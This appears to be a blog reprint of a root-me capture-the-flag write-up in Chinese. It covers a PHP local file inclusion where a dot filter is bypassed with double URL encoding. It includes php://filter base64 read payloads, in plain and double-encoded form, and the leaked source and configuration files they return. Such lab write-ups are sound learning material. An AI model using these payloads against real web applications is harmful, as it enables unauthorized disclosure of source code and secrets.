【root-me CTF練習】Web伺服器安全-本地檔案包含-雙重編碼
阿新 • • 發佈:2018-12-09
靶機地址
解題思路
通過構造測試連結發現,這關也是通過include函式包含的,並且檔名自動加上.inc.php,而這個版本的php是無法使用%00也就是null位元組進行截斷的,故我們不能自定義檔案字尾。
http://challenge01.root-me.org/web-serveur/ch45/index.php?page=ee
再次經過測試,發現有敏感字元檢測,不能輸入.點號
http://challenge01.root-me.org/web-serveur/ch45/index.php?page=ee.php
在前面做過的題中,我們知道include函式可以接受流操作,也就是可以使用
php://filter/convert.base64-encode/resource=xxxx
進行檔案內容的讀取,這裡因為限制了.點號,所以當前需要解決的是繞過字元檢測。
URL雙重編碼
不管是題目的提示或者自己測試也好,發現可以使用URL雙重編碼進行繞過字元檢測,後端是先進行字元檢測在進行URL解碼操作。
那麼現在就測試是否可以讀取指定檔案內容:這裡因為固定了字尾名,只能讀取已經存在了的.inc.php檔案,有三個:home、cv、contact
php://filter/convert.base64-encode/resource=home URL雙重編碼後: %25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%35%25%36%45%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%36%38%25%36%46%25%36%44%25%36%35
可以讀取home.inc.php的原始碼,經過BASE64解碼後發現呼叫了一個conf.inc.php檔案
<?php include("conf.inc.php"); ?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>J. Smith - Home</title>
</head>
<body>
<?= $conf['global_style'] ?>
< 那麼讀取此檔案看看:
php://filter/convert.base64-encode/resource=conf
URL雙重編碼後:
%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%35%25%36%45%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%36%36
成功得到flag
<?php
$conf = [
"flag" => "xxxxxxxxxx",
"home" => '<h2>Welcome</h2>
<div>Welcome on my personal website !</div>',
"cv" => [
"gender" => true,
"birth" => 441759600,
"jobs" => [
[
"title" => "Coffee developer @Megaupload",
"date" => "01/2010"
],
[
"title" => "Bed tester @YourMom's",
"date" => "03/2011"
],
[
"title" => "Beer drinker @NearestBar",
"date" => "10/2014"
]
]
],
"contact" => [
"firstname" => "John",
"lastname" => "Smith",
"phone" => "01 33 71 00 01",
"mail" => "[email protected]"
],
"global_style" => '<style media="screen">
body{
background: rgb(231, 231, 231);
font-family: Tahoma,Verdana,Segoe,sans-serif;
font-size: 14px;
}
div#main{
padding: 20px 10px;
}
nav{
border: 1px solid rgb(101, 101, 101);
font-size: 0;
}
nav a{
font-size: 14px;
padding: 5px 10px;
box-sizing: border-box;
display: inline-block;
text-decoration: none;
color: #555;
}
nav a.active{
color: #fff;
background: rgb(119, 138, 144);
}
nav a:hover{
color: #fff;
background: rgb(119, 138, 144);
}
h2{
margin-top:0;
}
</style>'
];